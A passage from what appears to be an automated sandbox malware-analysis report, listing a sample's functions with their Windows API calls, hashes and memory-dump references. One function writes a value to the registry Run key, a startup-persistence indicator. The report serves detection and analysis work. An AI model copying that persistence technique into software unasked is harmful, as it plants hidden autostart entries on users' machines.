                                                                                                      • Instruction ID: 3c3d96bbd0a4df4b5aad9f475ffa7db81b3b88ce8e2fa253b2e3b652f9eefd2f
                                                                                                      • Opcode Fuzzy Hash: b471c8b23e0565e2d637fdec32c87e7a6f256946f192debd5a72f2da2909eee6
                                                                                                      • Instruction Fuzzy Hash: DB516370D04249EFCF05EBE9D956AEDBBB8AF19318F50405EF401B3282DB795A04CB69
                                                                                                      Function 0042A4E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042A4E9
                                                                                                      • lstrlenW.KERNEL32(?,?,0046FFE0,75A85540), ref: 0042A570
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00445D30,?,?,?,0046FFE0,75A85540), ref: 0042A5DD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$H_prolog
                                                                                                      • String ID: 4AD$m_disables_keys
                                                                                                      • API String ID: 3834905643-3718384811
                                                                                                      • Opcode ID: d7a399d73422577df99a8821ed6c345781fe7b674b7adcbf0e7a9dcafa34c21f
                                                                                                      • Instruction ID: 203e1165c2efaf393f61b6ac4cb0d9602c11fb244ee757658ad2b0e580db4f88
                                                                                                      • Opcode Fuzzy Hash: d7a399d73422577df99a8821ed6c345781fe7b674b7adcbf0e7a9dcafa34c21f
                                                                                                      • Instruction Fuzzy Hash: 64413D3590011AAFCB14DBD5E999DEEB7B8BF08304F5440AEE405B3291EB78AE44CF19
                                                                                                      Function 0042965D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00429662
                                                                                                      • lstrlenW.KERNEL32(00000002,00000000,?,00000104,?,004297F7,?,?), ref: 004296AD
                                                                                                      • lstrlenW.KERNEL32(00000002,00000000,?,00000104,?,004297F7,?,?), ref: 0042970B
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 0042974A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$H_prologIncrementInterlocked
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 566586532-1156607891
                                                                                                      • Opcode ID: 0de748a28646d6acab61fd8771fd8a69e1bdb031d883876176abbb60e177333a
                                                                                                      • Instruction ID: 8b415f4851e939233429055f78567f18b4c3c5c54b03cce2589e798d83e2c012
                                                                                                      • Opcode Fuzzy Hash: 0de748a28646d6acab61fd8771fd8a69e1bdb031d883876176abbb60e177333a
                                                                                                      • Instruction Fuzzy Hash: 4E31B331A10029EBCB14DF65EC49DAE7BB8EF94314F50852EF815A7190DB78AE00CB98
                                                                                                      Function 0042453D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00424542
                                                                                                      • GetCursorPos.USER32(?), ref: 00424568
                                                                                                      • lstrlenW.KERNEL32(?,00445C44, / ,?,?,00000000,?,?,?,?,?,00000000), ref: 004245CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorH_prologlstrlen
                                                                                                      • String ID: / $Test
                                                                                                      • API String ID: 1080344900-3477436054
                                                                                                      • Opcode ID: c28ffa3daca467c83278608e3ac9d27bd2dc23f9fe48f993725f46b59699c7fe
                                                                                                      • Instruction ID: fd432eeb5efa056e9ca226c24887e2c6479c6b3bf91bcbc2dca07d9ac9fafd12
                                                                                                      • Opcode Fuzzy Hash: c28ffa3daca467c83278608e3ac9d27bd2dc23f9fe48f993725f46b59699c7fe
                                                                                                      • Instruction Fuzzy Hash: 9B21BF71900119ABCB10EFA5D8959EEBBB8EF44304F50442EF416B31D2CB385E85CBA8
                                                                                                      Function 004295CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004295D2
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004295EF
                                                                                                      • PostQuitMessage.USER32(0000FEFE), ref: 0042963B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileH_prologMessageModuleNamePostQuit
                                                                                                      • String ID: RESTART_DESKTOPOK_2018$open
                                                                                                      • API String ID: 1247823267-2738028770
                                                                                                      • Opcode ID: 9ce7916c3071b1d140c142eeec005c0550f1703aab72b351968c30de3ec0cf49
                                                                                                      • Instruction ID: ef55130555488632427de07c7581726a3f32810ff4c203688d7fbfce2e221a96
                                                                                                      • Opcode Fuzzy Hash: 9ce7916c3071b1d140c142eeec005c0550f1703aab72b351968c30de3ec0cf49
                                                                                                      • Instruction Fuzzy Hash: AB01677099010EABEF14EBA0CD5AFED7334AB10709F204469B501731D1E7B85A48CB65
                                                                                                      Function 0043748C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35registrystringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegOpenKeyW.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004374AB
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00437486,?,?,?,?," -bg,?,?,?,00454984), ref: 004374BA
                                                                                                      • RegSetValueExW.ADVAPI32(00000000,00000208,00000000,00000001,?,00000000,?,?,00437486,?,?,?,?," -bg,?,?), ref: 004374CF
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,00437486,?,?,?,?," -bg,?,?,?,00454984), ref: 004374DA
                                                                                                      Strings
                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00437499
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenValuelstrlen
                                                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                      • API String ID: 2964171075-3913687870
                                                                                                      • Opcode ID: 30a21f67d9d09dc05d4b23aefdb543e1f9a85324633e6cdcfef0dd8a64dfa347
                                                                                                      • Instruction ID: 2ceedae9dc0c1995bab63891bbcd1d91b5384f924f370bdbf12778e3a071c21b
                                                                                                      • Opcode Fuzzy Hash: 30a21f67d9d09dc05d4b23aefdb543e1f9a85324633e6cdcfef0dd8a64dfa347
                                                                                                      • Instruction Fuzzy Hash: 94F09A3781036AEBDF210FA0DC4ABEB3B69FF043A1F018620FC28A5160D775C9609B94
                                                                                                      Function 004264D2 Relevance: 7.6, APIs: 5, Instructions: 86stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00000000,?,7591E0B0,00000000,?,004262A3,?,?,0048047C), ref: 004264F0
                                                                                                      • GetEnvironmentVariableW.KERNEL32(0048047C,?,00000208,?,004262A3,?,?,0048047C), ref: 00426567
                                                                                                      • lstrcatW.KERNEL32(?,?,?,004262A3,?,?,0048047C), ref: 00426595
                                                                                                      • lstrlenW.KERNEL32(?,?,004262A3,?,?,0048047C), ref: 004265B0
                                                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 004265E5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$EnvironmentVariablelstrcatlstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 4067718196-0
                                                                                                      • Opcode ID: 3aac481ba7e8312c66bbcd26ff9a5867aff5618a8003f9844282bec0a3ffff28
                                                                                                      • Instruction ID: a93edea7da4d4899329c06e4eb84b9fb86500c73c2a2d66807996ec3ed989cbd
                                                                                                      • Opcode Fuzzy Hash: 3aac481ba7e8312c66bbcd26ff9a5867aff5618a8003f9844282bec0a3ffff28
                                                                                                      • Instruction Fuzzy Hash: 8431B072910228ABCF21DF48EC846DEB3F4FF18300F5045A6D945E3220E7749AD58BD8
                                                                                                      Function 004323BC Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004323C1
                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,?,00000000,?,?,0042181D,00456830,?,?,?), ref: 004323E2
                                                                                                      • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,00456830,?,00000000,?,?,0042181D,00456830,?,?,?,?), ref: 0043240B
                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,?,?,0042181D,00456830,?,?,?,?), ref: 00432428
                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0042181D,00456830,?,?,?,?,?,?,00421E9B,?,?), ref: 0043242B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Write$CloseCreateH_prologHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2041372692-0
                                                                                                      • Opcode ID: f6d74d7d6240c96fac3dbcc5884b1e11b7211d06fcb0e8ecfce2c5530af80d02
                                                                                                      • Instruction ID: e0cf3023d2533926c737bf7126066b7ab1a7276685e7b990d7760ebfb0582e74
                                                                                                      • Opcode Fuzzy Hash: f6d74d7d6240c96fac3dbcc5884b1e11b7211d06fcb0e8ecfce2c5530af80d02
                                                                                                      • Instruction Fuzzy Hash: 0A118E70500208BEDB10DB65DD89EAF7B7CEB88724F10421AF551E72E1D7B45A01CB64
                                                                                                      Function 00430328 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(?), ref: 0043033D
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0043035C
                                                                                                      • GetSystemMetrics.USER32(?), ref: 00430372
                                                                                                      • GetSystemMetrics.USER32(?), ref: 0043038E
                                                                                                      • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0043039F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$Metrics$InfoLongParametersWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 72108969-0
                                                                                                      • Opcode ID: 68da0af7bb68575eea16602732a5fda703a4aa413b43de711db5ae583fcc86f4
                                                                                                      • Instruction ID: e0a1c76b84bf8acbd95bf98adef0aa024b93c271ea1de0d9e930c4df4dd8b195
                                                                                                      • Opcode Fuzzy Hash: 68da0af7bb68575eea16602732a5fda703a4aa413b43de711db5ae583fcc86f4
                                                                                                      • Instruction Fuzzy Hash: FC11AC722507109FE7209F39CD4AB6AB3E4EBA8710F001B2EE482C76D0D778E845CB48
                                                                                                      Function 0041F600 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 0041F60F
                                                                                                      • GetDlgItem.USER32(?,000003F7), ref: 0041F642
                                                                                                      • SetWindowPos.USER32(00000000), ref: 0041F64B
                                                                                                      • GetDlgItem.USER32(?,0000041D), ref: 0041F655
                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,?,00000014,00000000), ref: 0041F66F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
